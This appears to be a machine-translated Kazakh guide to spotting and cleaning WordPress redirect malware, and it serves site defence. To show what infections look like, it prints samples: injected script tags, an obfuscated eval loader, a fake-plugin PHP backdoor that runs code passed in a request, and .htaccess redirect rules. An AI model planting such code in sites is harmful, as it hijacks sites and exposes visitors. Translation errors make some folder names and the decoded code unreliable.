WordPress қайта бағыттауды бұзу? Веб-сайтты қалай тазалау керек?

Бұл мақаланы тыңдаңыз

Зиянды WordPress қайта бағыттауыWordPress-ке зиянды бағыттау. Егер сіздің WordPress веб-сайтыңыз немесе әкімші панелі спам-сайтқа автоматты түрде қайта бағытталса, сіздің веб-сайтыңыз бұзылған және қайта бағыттайтын зиянды бағдарламамен жұқтырылған болуы мүмкін. Сонымен, сіздің сайтыңызда бұзылған WordPress қайта бағыттау зиянды бағдарламасымен не істей аласыз? Ең алдымен, сканерлеу арқылы сізде бұзу бар-жоғын растаңыз

Мұнда уақыт сіздің ең жақсы досыңыз екенін есте ұстаған жөн. Бұл туралы алаңдауға уақытты жоғалтпаңыз. Біз бұзуды толығымен түзетеміз және сіздің сайтыңызды тазалауға болады. Бірақ тез қозғалу керек.

Мен сізге сайттан зиянды қайта бағыттауларды жоюға, сайтыңызды түзетуге және оның қайталанбауына көз жеткізуге көмектесетін қадамдар арқылы көрсетемін. WordPress қайта бағыттау бұзуының бірнеше нұсқаларымен оның түбірін табу қиын болуы мүмкін. Бұл мақала зиянды бағдарламаны кезең-кезеңімен жылдам табуға және жоюға көмектеседі.

Мақаланың мазмұны:

• WordPress-тегі бұзылған қайта бағыттау (зиянды қайта бағыттау) нені білдіреді?
• Менің WordPress сайтым спамға қайта бағытталып жатқанын қалай білемін?
• WordPress бұзылған қайта бағыттау инфекциясын қалай жоюға болады?
• Веб-сайт спамға қайта бағытталуда: бұл менің веб-сайтыма қалай әсер етті?
• Болашақта WordPress Redirect бұзушылықтарын қалай болдырмауға болады?
• Зиянды қайта бағыттаулардың салдары қандай?
• Шығару

WordPress-тегі бұзылған қайта бағыттау (зиянды қайта бағыттау) нені білдіреді?

Бұзылған қайта бағыттау WordPress сіздің веб-сайтыңызға зиянды код енгізілгенде пайда болады, содан кейін ол келушілерді автоматты түрде басқа веб-сайтқа қайта бағыттайды. Әдетте, мақсатты веб-сайтта спам, сұр нарықтағы фармацевтикалық өнімдер немесе заңсыз қызметтер бар.

Бұл әрекетті тудыратын favicon зиянды бағдарламасы сияқты зиянды бағдарламалардың көптеген түрлері бар, сондықтан WordPress зиянды бағдарламалық құралды қайта бағыттау бұзуы басым симптомға сілтеме жасайтын жалпы термин: зиянды қайта бағыттау.

Бұзушылықтың бұл түрі миллиондаған веб-сайттарға әсер етеді және күн сайын қорқынышты шығындарға әкеледі. Веб-сайттар қалпына келтіру стрессін айтпағанда, кірісті, брендингті және SEO рейтингін жоғалтады.

Дегенмен, бұзудың ең жаманы - оның нашарлауы. Зиянды бағдарлама файлдар мен қалталар арқылы, тіпті веб-сайтыңыздың дерекқоры арқылы таралады, өзін көшіріп алады және басқаларды жұқтыру үшін веб-сайтыңызды пайдаланады.

Мен осы мақалада кейінірек бұзудың нақты салдарын қарастырамын, бірақ веб-сайтыңызды сақтаудағы басымдығыңыз дереу әрекет ету және кейінге қалдырмау екенін айту жеткілікті.

Менің WordPress сайтым спамға қайта бағытталып жатқанын қалай білемін?

Мәселені шешпес бұрын бұзылған WordPress сайтын қайта бағыттау, алдымен сіздің сайтыңыз бұзылғанын анықтауымыз керек. Инфекция сияқты, бұзу белгілері бар. Содан кейін, сіз белгілерді анықтағаннан кейін, диагнозды бірнеше сынақтар арқылы растай аласыз.

Жоғарыда айтылғандай, автоматты қайта бағыттаулар WordPress қайта бағыттауды бұзудың сенімді белгісі болып табылады. Спамды қайта бағыттау іздеу нәтижелерінен, белгілі бір беттерде немесе тіпті веб-сайтыңызға кіруге тырысқанда да орын алуы мүмкін. Қайта бағыттау проблемасы олар әрқашан дәйекті немесе сенімді бола бермейді.

Мысалы, егер сіз өзіңіздің сайтыңызға кірсеңіз және ол қайта бағытталса, бұл екінші, үшінші немесе төртінші рет болмауы мүмкін. Хакерлер ақылды және мәселе тек бір рет болатынына көз жеткізу үшін cookie файлын орнатады.

Мұның нәтижесі - бұл кездейсоқ болуы мүмкін деп ойлаған кезде, жалған қауіпсіздік сезіміне оңай түсу. Бұл кодта қате болуы мүмкін кішкентай мүмкіндік бар, бірақ мен «кішкентай» деп айтқанда, мен шексіз мүмкіндікті білдіремін.

WordPress жүйесінде бұзылған қайта бағыттау белгілерін тексеріңіз

Әдетте, хакерлер әртүрлі жолдармен көрінеді. Жеке алғанда, бұл ескі бақылау коды сияқты веб-сайт қателері болуы мүмкін, бірақ веб-сайтыңызда осы белгілердің екі немесе одан да көпін көрсеңіз, веб-сайтыңыз бұзылғанына сенімді бола аласыз.

• WordPress сайты спам-сайтқа қайта бағыттайды: WordPress қайта бағыттау бұзуының классикалық симптомы. Зиянды бағдарлама нұсқасына байланысты қайта бағыттау әртүрлі жолдармен немесе сайтыңыздың әртүрлі жерлерінде орын алуы мүмкін.
  — Автоматты қайта бағыттаулар: Зиянды бағдарлама сіздің сайтыңызға біреу кірген кезде келушілерді автоматты түрде спам-сайттарға бағыттайды. Бұл сондай-ақ біреу сіздің сайтыңызға Google немесе Яндекс арқылы кірген жағдайда орын алады. Әдетте, сайтыңызға кіруге әрекеттенсеңіз, сіз де қайта бағытталасыз.
  — Сілтемені қайта бағыттау: Біреу сілтемені басып, содан кейін басқа веб-сайтқа қайта бағытталады. Бұл әсіресе ақылды, өйткені келушілер бәрібір басқа орынға қайта бағытталуын күтетін сілтемелерді басады.
  — Тек мобильді құрылғылар үшін қайта бағыттаулар: Тек сіздің веб-сайтыңызға мобильді құрылғы арқылы кіруге болады, ол қайта бағытталады.
• Google нәтижелері «Сайт бұзылған болуы мүмкін» хабарын көрсетеді: Сіздің веб-сайтыңыз іздеу нәтижелерінде пайда болғанда, шағын хабарлама пайда болады: «Сайт бұзылған болуы мүмкін» - тақырыптың дәл астында пайда болады. Бұл Google-дың кірушілерге ықтимал бұзылған сайт туралы ескерту әдісі.
• Google қара тізімі: Ең үлкен қызыл жалау — сөзбе-сөз — Google қара тізімі сіздің сайтыңыз бұзылғанының сенімді белгісі. Сіздің келушілеріңіз басқа іздеу жүйесін пайдаланса да, олар бұзылған сайттарды белгілеу үшін Google қара тізімін пайдаланады.
• Яндекстегі сайтқа тыйым салу: сонымен қатар бұзылған веб-сайттың сенімді белгісі, сіздің веб-сайтыңыздың позициялары Яндекс іздеу нәтижелерінен шығады. Мүмкін негізгі бет қалады, бірақ бұл факт емес.
• Google Ads веб-сайтыңыздағы сценарийлерді белгілейді: Веб-сайтыңызда жарнамалауға тырыссаңыз, Google Ads веб-сайтыңызды тексеріп шығады және жазбаларыңыздағы немесе беттеріңіздегі қайта бағыттау сценарийлері туралы ескертеді.
• Веб-хост сіздің есептік жазбаңызды тоқтатты: Веб-сайттар бірнеше себептерге байланысты веб-сайттарды тоқтатады және зиянды бағдарлама негізгі себептердің бірі болып табылады. Веб-сайтыңызға кіруге тырысқанда бұл хабарды көрсеңіз, қандай да бір себептермен электрондық поштаңызды тексеріңіз. Немесе олардың қолдау көрсету тобына хабарласыңыз.
• Адамдар сіздің сайтыңызға шағымданады: Бұзушылықтардың қорқынышты бөлігі, егер оларда жақсы қауіпсіздік плагині орнатылмаған болса, веб-сайт әкімшілері әдетте бұзу туралы соңғы біледі. Көптеген адамдар бұл туралы біледі, себебі веб-сайтқа кірушілер мен пайдаланушылар веб-сайттың спамға қайта бағытталуына немесе тіпті қажетсіз электрондық поштаны алуына шағымданады.

Жоғарыда аталған белгілердің кез келгенін байқасаңыз, ол туралы ақпаратты жазып алған жөн. Сіз қандай браузерді қолдандыңыз? Сіз қандай құрылғыны қолдандыңыз? Бұл ақпарат WordPress бұзатын зиянды бағдарламасының түрін анықтауға көмектеседі, сондықтан оны тезірек жоюға болады.

Сайтыңызға қайта бағыттау хакері жұқтырғанын растаңыз

Симптомды анықтаудың келесі қадамы - бұл шынымен бұзу екеніне көз жеткізу. Веб-сайтыңыздың зиянды қайта бағыттауларға сезімтал екеніне көз жеткізудің ең жылдам жолы - веб-сайтыңызды сканерлеу.

1. Сайтты қауіпсіздік плагинімен сканерлеңіз

100 % құрылғысында веб-сайтыңыз бұзылғанына әлі де сенімді болмасаңыз, растау үшін тегін онлайн сканерді пайдаланыңыз. Өте жиі кездесетін жағдай - .htaccess файлындағы зиянды бағдарламаны көрсететін мобильді құрылғыдан веб-сайтыңызға кіру. Немесе біз жиі көретін бірі - автоматты түрде қайта бағыттайтын бет бұзу. Бұл дерекқорда зиянды бағдарлама болған кезде орын алады.

Кейінірек мақалада зиянды бағдарламаның басқа нұсқаларын қарастырамыз. Дәл қазір мен WordPress ұрлаған зиянды бағдарлама сіздің сайтыңыздың кез келген жерінде дерлік болуы мүмкін екенін атап өткім келеді.

Осыған байланысты әрбір сканер оны басқаша белгілейді. Мысалы, Quttera зиянды бағдарламаны келесідей белгілейді:

Қауіптің атауы: Heur AlienFile ген

WordFence белгісіз файлдардың тұтас тобы туралы ескертуді көрсетеді, мысалы:

* WordPress ядросындағы белгісіз файл: wp-admin/css/colors/blue/php.ini
* WordPress ядросындағы белгісіз файл: wp-admin/css/colors/coffee/php.ini
* WordPress ядросындағы белгісіз файл: wp-admin /css/colors/ectoplasm/php.ini

Бұл сіздің сайтыңыздың бұзылғанының жақсы белгілері, өйткені кейінірек көретініміздей, /wp-admin қалтасында WordPress орнатуыңыздың негізгі файлдарынан басқа ештеңе болмауы керек.

Өкінішке орай, бұл жоюға көмектеспейді. Басқа қауіпсіздік плагиндерінің анықтау механизмдеріне байланысты зиянды бағдарламаны қалай белгілейтініне қатысты бірнеше негізгі мәселелер бар. Көптеген жалған позитивтер, жетіспейтін файлдар және басқа да көптеген мәселелер бар. Сіздің веб-сайтыңыз маңызды, сондықтан қауіпсіздік плагинін ақылмен таңдаңыз.

2. Онлайн қауіпсіздік сканерімен сканерлеңіз

Сондай-ақ, бұзылған қайта бағыттайтын зиянды бағдарламаны тексеру үшін Sucuri SiteCheck сияқты онлайн қауіпсіздік сканерін пайдалануға болады. Онлайн қауіпсіздік сканері немесе сыртқы сканер зиянды сценарийлерді іздейтін беттеріңіздегі және жазбаларыңыздағы кодты сканерлейді.

Функционалды сканердегі жалғыз мәселе - ол қол жеткізуге болатын кодты сканерлей алады және сканерлейді. Яғни, негізінен беттер мен жазбалардың бастапқы коды. Бұл беттерде көптеген бұзылған қайта бағыттау зиянды бағдарламалары бар болса да, негізгі файлдарда бірнеше опциялар бар. Сыртқы сканер оларды мүлдем көрсетпейді.

Мен бірінші қатардағы диагностика құралы ретінде онлайн қауіпсіздік сканерін пайдалануды ұсынамын. Егер ол оң болып шықса, сіз оның оң екеніне сенімді бола аласыз және бұзылуды түзетуге тырысыңыз. Егер ол теріс болып шықса, алдыңғы сканер сканерлемеген жерлерді қолмен тексеруге болады. Осылайша сіз қолмен жасалатын жұмыстардың бір бөлігін алып тастай аласыз.

3. Сайтты зиянды бағдарламаларға қолмен сканерлеңіз

Бұзылған қайта бағыттайтын зиянды бағдарламаны іздеу үшін қауіпсіздік қосылатын модулін пайдалансаңыз, бұл бөлімді толығымен өткізіп жіберуге болады. Жақсы қауіпсіздік плагині төменде ұсынатын нәрсені жасайды, бірақ әлдеқайда жылдам және жақсырақ.

Веб-сайтыңызды зиянды бағдарламаларға сканерлеу файлдар мен дерекқорда қажетсіз кодты іздеуді білдіреді. «Қоқыс код» реферал ретінде пайдасыз екенін түсінемін, бірақ опцияларға байланысты тез тауып, бұзуды жариялайтын бірде-бір жол жоқ.

Дегенмен, келесі бөлімде мен басқа веб-сайттарда табылған зиянды бағдарламалардың бірнеше мысалдарын келтірдім. Ал келесі бөлімде біз бақыланатын қайта бағыттау әрекетіне байланысты зиянды бағдарлама енгізілетін әдеттегі орындар туралы айтатын боламыз.

WordPress қайта бағыттау зиянды бағдарламасы қандай көрінеді

Мен осы мақалада бұл жолды асыра айтып отырмын, бірақ WordPress бұзатын қайта бағыттау зиянды бағдарламасының көптеген нұсқалары бар, сондықтан «Мұны іздеңіз!» деп көрсететін бірыңғай стандартты код үзіндісі жоқ.

Дегенмен, мен сізге кейбір зиянды кодтардың қалай көрінетіні туралы түсінік бере аламын:

• Код бет тақырыбының бір жерінде немесе wp_posts кестесінің барлық беттерінде болуы мүмкін. Міне, кейбір мысалдар:

type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'>
 type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'>
 type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'>
 type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'>
 type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'>
 src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>

• wp_options кестелерінің site_url мекенжайында бейтаныс URL мекенжайлары болуы мүмкін. Міне, кейбір мысалдар:

stat/traksatiticss dest/colecfattracks gotosecnd ws.stienernando

• Сценарийлер де жасырын болуы мүмкін, яғни нақты кодты шығару үшін оларды онлайн деобфузкатор арқылы іске қосу керек.

түсініксіз код

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114, 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32, 32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,112,111,44,32,115,41,59,10,32,32,125,41,40,41,59));')

Және бұл шын мәнінде нені білдіреді:

(функция() var po = document.createElement('script'); po.type = 'мәтін/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('скрипт') [0];s.parentNode.insertBefore(po, s); )();

• Жалған плагиндерде ашылғанда келесідей файлдар болуы мүмкін:

<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action( 'admin_head', 'my_custom_js' ); add_action('wp_head', 'my_custom_js');

• Мобильді қайта бағыттаулар .htaccess файлындағы өзгерістерді көрсетеді. Төмендегі код https://daily-prize-best /life/?u=y2ykaew&o=2xup89r&m=1&t=mns2 мекенжайына қайта бағыттайды.

RewriteEngine On RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteEngine RewriteBase / RewriteRule бойынша ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php[L]

Қайта бағытталатын зиянды бағдарламаны іздейтін орындар

WordPress екі негізгі бөлікке бөлінеді: файлдар және дерекқор. Бұзылған қайта бағыттайтын зиянды бағдарламаның проблемасы оның кез келген жерде болуы мүмкін.

Егер сіз веб-сайт кодын өзгертумен таныс болсаңыз, мен айтқан қайта бағыттау кодын келесі жерлерден таба аласыз. Күдікті қондырмаларды іздеу үшін веб-сайтыңыздың сақтық көшірмесін жүктеп алыңыз - файлдар мен дерекқор.

Тағы да, классикалық, ситуациялық, құрылғыға қатысты немесе тіпті жинақталған қайта бағыттаулар сияқты опциялар бар екенін есте сақтаңыз. Әрқайсысы үшін код әртүрлі болады, сондай-ақ орналасқан жері де болады.

A. Веб-сайт файлдары

• WordPress негізгі файлдарыA: Ең қарапайымдардан бастап, /wp-admin және /wp-includes жаңа WordPress орнатуынан ерекшеленбеуі керек. Бұл index.php, settings.php және load.php файлдарына да қатысты. Бұл негізгі WordPress файлдары және параметрлер оларға ешқандай өзгерістер енгізбейді. Өзгерістердің бар-жоғын білу үшін WordPress-тің жаңа нұсқасымен салыстырыңыз. .htaccess файлы ерекше жағдай болып табылады. Мобильді қайта бағыттауды бұзу әрқашан осы файлда көрсетіледі. Құрылғыға тән әрекетті анықтайтын пайдаланушы агент ережесін іздеңіз және қайта бағыттау сценарийін тексеріңіз.
• Белсенді тақырып файлдары: Егер сізде бірнеше тақырып орнатылған болса (оны бастау ұсынылмайды), олардың тек біреуі белсенді екеніне көз жеткізіңіз. Одан кейін header.php, footer.php және functions.php сияқты белсенді тақырып файлдарын қарап шығыңыз. Мұны тексерудің жақсы жолы - әзірлеушілер сайттарынан таза орнатуларды жүктеп алу және кодты сол файлдарға сәйкестендіру. Әдетте, бұл файлдар белгілі бір пішімде болуы керек, сондықтан қоқыс коды шығып қалады. Параметрлер кодты да өзгертетінін есте сақтаңыз. Сондай-ақ, егер сіз бос тақырыптарды немесе плагиндерді пайдаланып жатсаңыз, диагностиканы дәл осы жерден тоқтатуға болады, себебі біз сізді солардың кесірінен бұзылғаныңызға сендіреміз.
• Сіздің сайтыңыздағы жалған плагиндер: Иә, солай. Хакерлер зиянды бағдарламаны жасырып, оны мүмкіндігінше заңды етеді. wp-content/plugins қалтасына өтіп, қараңыз. Сіз орнатпаған нәрсе ме? Кейбір оғаш көшірмелер? Олардың кез келгенінің қалталарында бір немесе екі файл ғана бар ма?

Міне, кейбір мысалдар:

/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php

Егер сізде көптеген плагиндер орнатылған болса, олардың барлығын тексеру қиын болуы мүмкін. Жалған плагиндерді анықтаудың негізгі ережесі мынада: конвенция бойынша заңды плагин атаулары сирек бас әріптен басталады және олардың атауларында сызықшадан басқа арнайы таңбалар болмайды. Бұл ережелер емес, конвенциялар. Сондықтан жалғандарды нақты анықтау үшін оларға тым көп мән бермеңіз. Плагиннің жалған екеніне күмәндансаңыз, оны Google-да іздеңіз және WordPress репозиторийінен түпнұсқа нұсқасын табыңыз. Оны сол жерден жүктеп алып, файлдардың сәйкестігін тексеріңіз.

B. Мәліметтер қоры

• wp_posts кестесі: Зиянды сценарийлер әр бетте жиі болады. Бірақ, жоғарыда айтқанымыздай, хакерлер өте айлакер. Бұзушылық жоқ деп шешпес бұрын жазбалардың жақсы үлгісін тексеріңіз. Беттеріңіз бен жазбаларыңыздың кодын тексерудің тағы бір жолы - браузер арқылы беттің бастапқы кодын тексеру. Сайтыңыздың әрбір бетінде браузерлер оқи алатын HTML коды бар. Беттің бастапқы кодын ашып, үстіңгі деректемені, төменгі колонтитулды және сценарий тегтері арасындағы барлық жерде орынсыз көрінетін нәрселерді тексеріңіз.Бас бөлімінде шолғыш сол бетті жүктеу үшін пайдаланатын, бірақ кірушіге көрсетілмейтін ақпарат бар. Зиянды бағдарлама сценарийлері жиі осы жерде жасырылады, сондықтан олар беттің қалған бөлігінен бұрын жүктеледі.
• wp_options кестесі: siteurl. Бұл 99% жағдайларда веб-сайтыңыздың URL мекенжайы болуы керек. Егер олай болмаса, бұл сіздің бұзуыңыз.

Дегенмен, қазір ештеңені жоюға тырысатын уақыт емес. Сіз Javascript немесе PHP сценарийлерінің зиянды екеніне толық сенімді болуыңыз керек. Сіз зиянды бағдарламадан тез құтылғыңыз келеді, бірақ асығыс сізді жұмыс істемей тұрған сайтқа апарады.

Зиянды бағдарламалық құралды қайта бағыттауды тексерудің басқа жолдары

Сіз веб-сайт әкімшісі ретінде жоғарыда аталған белгілердің барлығын көрмеуіңіз мүмкін. Хакерлер сіздің IP және тіркелгіңізді бұзу нәтижелерін көруден ақылды түрде болдырмайды, өйткені олар мүмкіндігінше ұзақ уақыт бойы анықталмай қалғысы келеді.

Сондай-ақ, симптомды бір рет көріп, содан кейін оны қайта жасай алмауыңыз мүмкін. Мұның бәрі өте түсініксіз. Симптомдарды сіздің веб-сайтыңызда тікелей көрмесеңіз, тексерудің бірнеше басқа жолдары бар.

• Google іздеу консолін тексеріңіз: Олар «Қауіпсіздік мәселелері» бөлімінде зиянды бағдарламаның инфекциясын белгілейді.
• Веб-сайтыңызға кіру үшін инкогнито браузерін пайдаланыңызтұрақты келушінің не көретінін көру үшін
• Әрекет журналдарында әдеттен тыс пайдаланушы әрекеті бар-жоғын тексеріңіз, мысалы, пайдаланушы артықшылықтарын көтеру немесе хабарлар жасау.

Келесі бөлімде тек жою туралы айтылады. Терең дем алып, бір шыны шай немесе кофе ішіңіз. Бүкіл процесті бірге өтейік.

WordPress бұзылған қайта бағыттау инфекциясын қалай жоюға болады?

Енді сіздің веб-сайтыңыз басқа сайтқа бағытталып жатқанын білеміз, сізге тез әрекет ету керек. Уақыт өте келе бұзулар саны экспоненциалды түрде артады, себебі зиянды бағдарлама веб-сайтыңыздағы көбірек файлдар мен қалталарға таралады. Бұл зақымдануды арттырып қана қоймай, қалпына келтіруді әлдеқайда қиындатады.

Сіз осы бөлімге жеткенге дейін веб-сайтыңызды тексеріп шықтыңыз деп ойлаймын. Дегенмен, егер сізде жоқ болса, алдымен веб-сайтыңызды тексеріп шығу керек.

Веб-сайтыңыздан зиянды бағыттауды жоюдың 2 негізгі жолы бар. Мен қауіпсіздік қосылатын модулін пайдалануды ұсынамын, өйткені мен веб-сайтқа хакерлік шабуылдардың келтіретін зиянын өз көзіммен көрдім.

1. (ҰСЫНЫЛАДЫ) Қайта бағыттау вирусын жою үшін қауіпсіздік плагинін пайдаланыңыз

Қауіпсіздік плагиндері анықтау қиын зиянды бағдарламаларды жою үшін пайдаланылады. Сізге тек плагинді сайтыңызға орнатып, сайтыңыздың қалпына келуін бірнеше минут күту жеткілікті.

Веб-сайтыңыз бұзылғанын растау үшін сканерді пайдаланған болсаңыз, оны жаңартып, сайтыңызды қайтарып алу жеткілікті.

Мұндай плагиндерді пайдаланудың бірнеше себептері бар:

1. Тек зиянды бағдарламаларды жойып, сайтыңызды бүлінбеген күйде қалдырыңыз;
2. Хакерлер қайта жұқтыру үшін қалдыратын бэкдорларды табыңыз, сондай-ақ оларды жойыңыз;
3. Сайтты зиянды трафиктен қорғауға арналған кіріктірілген брандмауэр.

wp-admin кіре алмасаңыз

Бұл жағдайда көмек алу үшін зиянды бағдарламаларды жою қызметіне хабарласыңыз. Арнайы қауіпсіздік сарапшысы веб-сайтыңызды жылдам тазалап, оның сақтық көшірмесін жасап, тез арада іске қосылғанына көз жеткізеді.

2. WordPress қайта бағыттайтын зиянды бағдарламаны қолмен жойыңыз

Веб-сайтыңыздан қолмен қайта бағыттайтын зиянды бағдарламаны жоюға болады, бірақ мұны істеу үшін алғышарттар бар.

- Біріншіден, WordPress қалай конфигурацияланатынын білуіңіз керек. Негізгі файлдардың сыртқы түрінен әрбір плагин мен тақырып жұмыс істеу үшін жасайтын қалталар мен файлдарға дейін. Бір қажетті файлды жою сіздің сайтыңызды бұзуы мүмкін, сондықтан сіздің сайтыңыз тек бұзылып қана қоймайды, сонымен қатар өшіріледі.

- Екіншіден, сіз жақсы кодты жаманнан ажырата білуіңіз керек, яғни. зиянды бағдарлама. Зиянды код заңды код ретінде жасырылады немесе оны оқу мүмкін емес етіп жасырады. Жақсы кодты нашар кодтан ажырату өте қиын, сондықтан көптеген сканерлер жалған позитивтерден зардап шегеді.

ЕскертуЖ: Зиянды бағдарламаны жою үшін WordPress сарапшысын жалдай аласыз. Қауіпсіздік сарапшылары қымбатқа түсетінін және бұзуды жою үшін уақытты қажет ететінін есте сақтаңыз.

Сондай-ақ, олар сіздің қайталанбайтыныңызға кепілдік бермейді. Дегенмен, мен зиянды бағдарламаны қолмен жою әрекетінен гөрі осы әрекетті ұсынамын.

Жарайды, бұл ескертулер. Міне, сіздің сайтыңыздан қайта бағытталатын зиянды бағдарламаны жою қадамдары:

1. Сайттың сақтық көшірмесін жасаңыз

Бірдеңе жасамас бұрын сақтық көшірме жасауды ұмытпаңыз. Сайт бұзылса да, ол жұмыс істейді. Зиянды бағдарламаны жою процесі кезінде бірдеңе дұрыс болмаса, сізде қайта оралу үшін сақтық көшірме бар. Бұзылған сайтты тазалау қиын. Бұзылған веб-сайтты тазалау одан да қиын және кейде қалпына келтіру мүмкін емес.

Веб-хост сайтыңызды уақытша тоқтата тұруы немесе тіпті жоюы мүмкін. Содан кейін веб-сайтыңызға қол жеткізу, тіпті оны тырнау үшін де үлкен мәселе болып табылады. Тоқтатылған сайтқа кіру үшін веб-хосттың қолдау көрсету тобына хабарласуыңыз керек, бірақ жойылған сайт сақтық көшірмесінсіз орындалмайды.

2. WordPress-тің таза нұсқасын жүктеп алыңыз

Жаңа WordPress қондырғыларын, сондай-ақ сіз пайдаланатын кез келген плагиндер мен тақырыптарды жүктеп алыңыз. Нұсқалар сіздің сайтыңыздағыға сәйкес келуі керек.

Оларды жүктеп алғаннан кейін бос файлдарды веб-сайтыңыздың файлдарымен салыстыру үшін пайдалануға болады. Айырмашылықтарды табу үшін онлайн дифференциалды тексеру құралын пайдалануға болады, өйткені біз оларды қолмен қарауды ұсынбаймыз.

Негізінде, бұл көптеген қауіпсіздік сканерлері жасайтын қолтаңба сәйкестігі. Дегенмен, кем дегенде енді сіз сайтыңыздың дұрыс жұмыс істеуі үшін қандай файлдар мен қалталар қажет екенін білесіз. Бұл кезеңде ештеңені жоймаңыз. Қандай файлдар қажет екенін түсіну үшін сіз жай ғана негізгі сызықты орнатасыз.

3. Қайта бағытталатын зиянды бағдарламаны іздеңіз және жойыңыз

Бұл процестегі ең қиын қадам болуы мүмкін. Мен айтқанымдай, сіз жақсы кодты нашар кодтан ажырата білуіңіз керек, содан кейін оны қажетінше алып тастаңыз немесе ауыстырыңыз.

Негізгі WordPress файлдарын тазалаңыз

Веб-сайтыңыз сияқты WordPress нұсқасын алу өте маңызды, әйтпесе веб-сайттың бұзылуы мүмкін. Жүктеп салынғаннан кейін веб-сайт файлдарына кіру және келесі қалталарды ауыстыру үшін cPanel немесе FTP пайдаланыңыз:

— /wp-admin
— /wp-enables

Бұл қалталарды WordPress веб-сайтыңызды іске қосу және жүктеу үшін пайдаланады және пайдаланушы мазмұнын мүлде сақтауға арналмаған. Бұл оңай бөлігі болды. Енді біртүрлі код үшін келесі файлдарды тексеріңіз:

- index.php
wp-config.php
wp-settings.php
- wp-load.php
- .htaccess

Сондай-ақ, /wp-uploads қалтасында PHP сценарийлері болмауы керек. Мен «біртүрлі код» өте анық емес екенін түсінемін, бірақ бұрын айтқанымыздай, бұзылған WordPress қайта бағыттау зиянды бағдарламасының көптеген нұсқалары бар.

Осылайша, мен сізге бұл файлдардың кез келгенінде қандай кодты көретініңізді айта алмаймын. Егер сіз кодтың қалай жұмыс істейтінін түсінсеңіз, әрқайсысының не істейтінін түсіну және кодтың кез келген басқа нәрсе жасайтынын білу үшін WordPress файлдарының тізіміне жүгінуге болады. Бұл кодты тапқаныңызға сенімді болғаннан кейін оны жойыңыз.

Тақырыптар мен плагиндерді зиянды бағдарламалардан тазалаңыз

Тақырыппен және плагинмен байланыстырылған барлық файлдар мен қалталар /wp-content қалтасында сақталады. Кодта қай жерде айырмашылық бар екенін көру үшін веб-сайтыңыздың әрбір файлын тексеруге болады.

Бұл жерде ескерту: барлық өзгерістер жаман емес. Егер сізде плагиндер немесе тақырыптардың кез келгенін теңшеген болсаңыз - сізде болуы мүмкін - таза орнатудан айырмашылықтар болады. Бұл параметрлерді жоғалтуға қарсы болмасаңыз, файлдарды жаппай ауыстыруға болады.

Сіз жасаған жұмысыңызды сақтағыңыз келуі мүмкін, сондықтан айырмашылықтардың әрқайсысын мұқият қарастырыңыз. Егер кодтың логикасын ұстанатын болсаңыз, файлдардың бір-бірімен және сайттың қалған бөлігімен қалай әрекеттесетінін түсіне аласыз. Бұл зиянды бағдарламаны табуға және оны жоюға мүмкіндік береді.

Егер сізде тақырыптар мен плагиндердің айтарлықтай саны болса, бұл қиын тапсырма болуы мүмкін. Міне, бастау үшін жақсы орындар:

• Белсенді тақырып файлдары
  - header.php
  — footer.php
  — functions.php
• Әлсіз плагиндер
  - Жақында біреу бұзылды ма?
  - Жаңартылмағандар бар ма
• Жалған плагиндер
  - Өте аз файлдар
  - Айқын көшірмелер

Кейбір зиянды файлдар зиянсыз болып көрінеді және көбінесе нақты файл атауларына еліктейді. Бұл жерде таза орнатулар ыңғайлы болады, сонымен қатар толық сенімді болмасаңыз, қолдау алу үшін плагин мен тақырып әзірлеушілеріне хабарласыңыз.

WordPress дерекқорынан зиянды бағдарламаны жойыңыз

